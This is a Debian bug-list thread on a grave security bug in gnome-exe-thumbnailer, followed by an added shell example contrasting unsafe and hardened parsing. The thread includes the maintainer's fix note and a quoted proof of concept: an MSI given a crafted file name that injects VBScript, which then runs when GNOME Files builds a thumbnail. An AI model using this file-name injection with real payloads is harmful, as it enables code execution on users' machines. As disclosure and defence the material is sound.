[pkg-wine-party] Bug#868705: Bug#868705: gnome-exe-thumbnailer: Thumbnail generation for MSI files executes arbitrary VBScript
James Lu
bitflip3 at gmail.com
Tue Jul 18 00:03:27 UTC 2017
Hi Nils,
I wasn't able to reproduce the exploit on my (64-bit) system with either
Caja or Nautilus (it also required setting up a new wineprefix in
~/.wine). The msi thumbnail ended up generating without any version
information tag at all.
Regardless, I've gone and replaced the VBScript-based parsing entirely
with msitools' msiinfo in
https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5;
hopefully this should fix the issue. I'll tag a new release soon and
look at pushing the fix to Debian.
(Also CC'ing the other maintainers, who I don't think are on the Debian
Wine list)
Best,
James
On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
> Package: gnome-exe-thumbnailer
> Version: 0.9.4-2
> Severity: grave
> Tags: security
> Justification: user security hole
>
> Dear Maintainer,
>
> the following PoC is copied verbatim from my post about the parsing issue:
> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
>
> Proof of Concept
>
> Install Dependencies
>
> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.
>
> If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
>
> Create MSI Files
>
> Create a file named poc.xml with the following content:
>
> <?xml version="1.0" encoding="utf-8"?>
> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
> <Product Version="1.0"/>
> </Wix>
>
> Execute the following Bourne Shell code:
>
> wixl -o poc.msi poc.xml
> cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
>
> Trigger Execution
>
> Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
>
> *** End of the template - remove these template lines ***
>
>
> -- System Information:
> Debian Release: 9.0
> APT prefers stable
> APT policy: (500, 'stable')
> Architecture: i386 (i686)
>
> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/dash
> Init: sysvinit (via /sbin/init)
>
> Versions of packages gnome-exe-thumbnailer depends on:
> ii icoutils 0.31.2-1.1
> ii imagemagick 8:6.9.7.4+dfsg-11
> ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11
> ii libglib2.0-bin 2.50.3-2
>
> Versions of packages gnome-exe-thumbnailer recommends:
> pn wine <none>
> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none>
>
> gnome-exe-thumbnailer suggests no packages.
>
> -- no debconf information
>
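The bug class discussed in this thread, as an added example (not code from gnome-exe-thumbnailer or from the linked commit): a file name pasted into generated script text becomes part of the script, while the same name handed to a parser as its own argument stays data. The VBScript line, the function names, the `MSIINFO` override and the sample file names are assumptions made for illustration; `msiinfo export FILE Property` is msitools' table export.

```shell
#!/bin/sh
# Added illustration. The template is an assumed stand-in for any script
# that is generated with the file name pasted into a string literal.

# Unsafe pattern: the name becomes part of the VBScript source text.
render_vbs_unsafe() {
    printf 'Set db = installer.OpenDatabase("%s", 0)\n' "$1"
}

# Count the double quotes in the rendered line. A name that stays inside
# the literal leaves exactly 2; anything else means the name has changed
# the structure of the script instead of being treated as data.
quote_count() {
    render_vbs_unsafe "$1" | tr -cd '"' | wc -c | tr -d ' '
}

# Hardened pattern: no script is generated. The name is passed as a single
# argv element, so quotes, spaces and parentheses in it are never re-parsed.
# MSIINFO can be overridden (assumption of this example) to test without
# msitools installed.
msi_product_version() {
    case "$1" in
        /*|./*) path=$1 ;;
        *)      path=./$1 ;;   # a leading "-" can no longer look like an option
    esac
    "${MSIINFO:-msiinfo}" export "$path" Property |
        awk -F '\t' '$1 == "ProductVersion" { sub(/\r$/, "", $2); print $2; exit }'
}
```
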